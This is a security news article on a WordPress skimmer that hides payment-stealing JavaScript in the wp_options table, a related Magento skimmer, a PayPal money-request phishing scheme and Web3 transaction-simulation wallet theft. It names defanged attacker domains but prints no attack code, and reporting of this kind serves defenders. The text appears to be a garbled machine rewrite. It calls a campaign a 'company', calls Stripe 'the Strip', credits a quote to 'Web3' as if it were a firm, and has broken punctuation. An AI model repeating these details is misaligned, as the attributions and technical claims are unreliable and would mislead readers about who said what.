Cyber security researchers are warning about the emergence of a new stealth credit card skimmer company which targets WordPress e-commerce pages by inserting malicious JavaScript code into a database table linked to the content management system (CMS).
“This credit card skimmer malware targeting WordPress websites silently injects malicious JavaScript into database records to steal sensitive payment details,” Sucuri researcher Pooja Srivastava said in a new analysis.
“The malware is activated specifically on checkout pages, either by hijacking existing payment fields or by entering a fake credit card form.”
Website security company owned by GoDaddy says it has discovered malware embedded in WordPress wp_options table with the “widget_block” option, which allows you to avoid detection by scanning tools and stay on hacked sites without attracting attention.
The idea here is to inject malicious JavaScript into an HTML block widget via the WordPress admin panel (wp-admin > widgets).
The JavaScript code works by checking if the current page is a payment page and ensures that it only fires after the site visitor is about to enter their payment details, at which point it dynamically creates a fake payment screen that mimics legitimate payment processors like the Strip.
The form is designed to record users’ credit card numbers, expiration dates, CVV numbers, and payment information. Alternatively, the fake script is also capable of capturing data entered on legitimate payment screens in real-time for maximum compatibility.
The stolen data is then Base64 encoded and combined with AES-CBC encryption to appear harmless and resist analysis attempts. In the final step, it is transferred to a server controlled by the attacker (“valhafather(.)xyz” or “fqbe23(.)xyz”).
The development comes more than a month after Sucuri highlighted a similar company that used JavaScript malware to dynamically generate fake credit card forms or extract data entered into payment fields on payment pages.
The collected information is then subjected to three levels of obfuscation: first, it is JSON-encoded, XOR-encrypted with the “script” key, and finally Base64-encoded before being sent to the remote server (“staticfonts(.)com” . “).
“The script is designed to extract sensitive credit card information from certain fields on the checkout page,” Srivastava noted. “The malware then collects additional user data through the Magento API, including username, address, email address, phone number and other payment information. This data is extracted using Magento’s customer and quote data models.”
The disclosure also follows the discovery of a financially motivated phishing email campaign that tricked recipients into clicking on PayPal login pages under the guise of an outstanding payment request amounting to nearly $2,200.
“It appears that the scammer simply registered a Microsoft 365 test domain, which is free for three months, and then created a mailing list (Billingdepartments1(@)gkjyryfjy876.onmicrosoft.com) containing victims’ emails,” said Carl Windsor of Fortinet FortiGuard Labs. said. “On PayPal’s web portal, they just ask for money and add a mailing list as an address.”
What makes the campaign insidious is that the messages originate from a legitimate PayPal address (service@paypal.com) and contain a valid character in the URL that allows the email to slip past security tools.
To make matters worse, once a victim tries to log into their PayPal account to request a payment, their account is automatically linked to an email address on the mailing list, allowing the threat actor to take control of the account.
In recent weeks, attackers have also been seen using a new technique called transaction simulation to steal cryptocurrency from victim wallets.
“Modern Web3 wallets include transaction simulation as a convenient feature,” Scam Sniffer said. “This capability allows users to preview the expected outcome of their transactions before signing them. Although designed to improve transparency and user experience, attackers have found ways to exploit this mechanism.”
Infection chains involve exploiting the time gap between simulation and transaction execution, allowing attackers to create fake sites that mimic decentralized applications (DApps) to perform fraudulent wallet withdrawal attacks.
“This new attack vector represents a significant evolution in phishing techniques,” said anti-fraud solutions provider Web3. “Instead of relying on simple deception, attackers are now leveraging robust wallet features that users rely on for security. This sophisticated approach makes detection particularly challenging.”
